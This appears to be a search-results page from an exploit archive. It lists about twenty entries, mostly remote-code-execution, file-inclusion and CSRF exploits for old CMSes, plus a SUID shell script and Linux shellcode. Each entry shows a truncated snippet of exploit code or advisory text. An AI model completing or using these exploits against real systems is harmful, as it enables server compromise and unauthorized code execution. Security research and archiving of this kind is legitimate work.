42 matches found
Lotus CMS Fraise v3.0 LFI - Remote Code Execution Exploit
No description provided by source. !/usr/bin/python Lotus CMS Fraise v3.0 LFI - Remote Code Execution Exploit greetz Tecr0C :0 Vuln: lines 15-23 in core/lib/router.php ---------- sof //Get page request if any $page = $this-getInputString"page", "index"; //Get plugin request if any $plugin =...
Lotus CMS Fraise 3.0 - Local File Inclusion Remote Code Execution
Lotus CMS Fraise 3.0 - Local File Inclusion Remote Code Execution !/usr/bin/python Lotus CMS Fraise v3.0 LFI - Remote Code Execution Exploit greetz Tecr0C :0 Vuln: lines 15-23 in core/lib/router.php ---------- sof //Get page request if any $page = $this-getInputString"page", "index"; //Get plugin...
Lotus CMS Fraise 3.0 - Local File Inclusion / Remote Code Execution
!/usr/bin/python Lotus CMS Fraise v3.0 LFI - Remote Code Execution Exploit greetz Tecr0C :0 Vuln: lines 15-23 in core/lib/router.php ---------- sof //Get page request if any $page = $this-getInputString"page", "index"; //Get plugin request if any $plugin = $this-getInputString"system", "Page"; //...
Shell create & command execution in JAF CMS
Vulnerability ID: HTB22665 Reference: http://www.htbridge.ch/advisory/shellcreatecommandexecutioninjafcms.html Product: JAF CMS Vendor: JAF CMS http://jaf-cms.sourceforge.net/ Vulnerable Version: 4.0 RC2 Vendor Notification: 21 October 2010 Vulnerability Type: Shell create command execution Statu...
CMSQLite <= 1.2 & CMySQLite <= 1.3.1 Remote Code Execution Exploit
Exploit for php platform in category web applications ================================================================== CMSQLite Thanks to rgod for the php code and Natural Killer "; if $argc 126 $result.=" ."; else $result.=" ".$string$i; if strlendechexord$string$i==2 $exa.="...
CMSQLite 1.2 CMySQLite 1.3.1 - Remote Code Execution
CMSQLite 1.2 CMySQLite 1.3.1 - Remote Code Execution !/usr/bin/php -q -d shortopentag=on Thanks to rgod for the php code and Natural Killer "; if $argc 126 $result.=" ."; else $result.=" ".$string$i; if strlendechexord$string$i==2 $exa.=" ".dechexord$string$i; else $exa.=" 0".dechexord$string$i;...
Nagios XI - Multiple Cross-Site Request Forgery Vulnerabilities
Nagios XI - Multiple Cross-Site Request Forgery Vulnerabilities source: https://www.securityfocus.com/bid/42322/info Nagios XI is prone to multiple cross-site request-forgery vulnerabilities because the application fails to properly validate HTTP requests. Successful exploit requires that the...
Joomla 1.5.12 RCE via TinyMCE upload vulnerability
Exploit for unknown platform in category web applications ================================================== Joomla 1.5.12 RCE via TinyMCE upload vulnerability ================================================== ?php / Joomla 1.5.12 Remote Code Execution via TinyMCE upload vulnerability Tested...
Greenwood Content Manager Code Execution
!usr/bin/python Greenwood Content Manager Remote Code Execution AUTHOR : Sina Yazdanmehr R3d.W0rm Discovered by : Sina Yazdanmehr R3d.W0rm Our Site : http://ircrash.com My Official WebSite : http://r3dw0rm.ir IRCRASH Team Members : Khashayar Fereidani - R3d.w0rm Sina Yazdanmehr Download :...
munky-bliki lfi
!user/bin/python -- coding: cp1256 -- munky-bliki Lfi AUTHOR : IRCRASH R3d.W0rm Sina Yazdanmehr Discovered by : IRCRASH R3d.W0rm Sina Yazdanmehr Our Site : Http://IRCRASH.COM IRCRASH Team Members : Dr.Crash - R3d.w0rm Sina Yazdanmehr Script Download :...
fuzzylime cms 3.01 Remote Command Execution Exploit
No description provided by source. !/usr/bin/perl fuzzylime 3.0.1 Perl exploit discovered & written by Ams [email protected] DESCRIPTION: There are availability to load files through script rss.php, and also there are unfiltered extract; usage. This exploit creates shell in...
fuzzylime cms 3.01 Remote Command Execution Exploit
Exploit for unknown platform in category web applications =================================================== fuzzylime cms 3.01 Remote Command Execution Exploit =================================================== !/usr/bin/perl fuzzylime 3.0.1 Perl exploit discovered & written by Ams DESCRIPTION...
Fuzzylime CMS 3.01 - Remote Command Execution
!/usr/bin/perl fuzzylime 3.0.1 Perl exploit discovered & written by Ams [email protected] DESCRIPTION: There are availability to load files through script rss.php, and also there are unfiltered extract; usage. This exploit creates shell in /code/counter/middleindexinc.php USAGE: Run exploit: perl...
SetCMS 3.6.5 - Remote Command Execution
!/usr/bin/perl SetCMS v3.6.5 setcms.org remote commands execution exploit by RST/GHC o4.o9.2oo6 coded by 1dt.w0lf THIS IS UNPUBLISHED RST/GHC EXPLOIT CODE KEEP IT PRIVATE про багу: file: functions.php FUNCTION ip global $userid; ifgetenv'HTTPCLIENTIP' $userip = getenv'HTTPCLIENTIP';...
rapidleech.txt
Author : CSD Software : Rapidleech Company : Rapidleech Bug : Remote Code execute Exploit : /usr/bin/perl use IO::Socket; $ha=$ARGV0; $pa=$ARGV1; $file="kills.php"; if !$ARGV1 print"\n"; print "+ Coded By Nightmare RedDragon or H3CT0R3 +\n"; print "+ Bug Discovered By Dark L0rD +\n"; print "+ Bla...
cdrecord $RSH exec() SUID Shell Creation
No description provided by source. !/bin/bash cdrecord-suidshell.sh - Iruid CAU 09.2004 Exploits cdrecord's exec of $RSH before dropping privs cat ./cpbinbash.c include include include main int argc, char argv int fd1, fd2; int count; char buffer1; / Set ID's / setuid geteuid ; setgid geteuid ; /...
Limbo - Lite Mambo CMS Multiple Vulnerabilities
Hello Title : Limbo - Lite Mambo CMS Multiple Vulnerabilities Remote File including - Full path - make php shell - and create folder with 0777 permissions Discovered by : HACKERS PAL Copyrights : HACKERS PAL Website : WwW.SoQoR.NeT Email : [email protected] // Remote File Including...
TinyPHPForum 3.6 - UpdatePF.php Authentication Bypass
TinyPHPForum 3.6 - UpdatePF.php Authentication Bypass source: https://www.securityfocus.com/bid/19281/info TinyPHPForum is prone to an authentication-bypass vulnerability because it fails to prevent an attacker from accessing admin scripts directly without requiring authentication. A remote...
SysInfo 1.21 - 'sysinfo.cgi' Remote Command Execution
!/usr/bin/php -q -d shortopentag=on 126 $result.=" ."; else $result.=" ".$string$i; if strlendechexord$string$i==2 $e...
linux/x86 chroot & standart 66 bytes
Exploit for linux/x86 platform in category shellcode ==================================== linux/x86 chroot & standart 66 bytes ==================================== Linux/x86 chroot and standart shellcode. By Okti http://okti.nm.ru...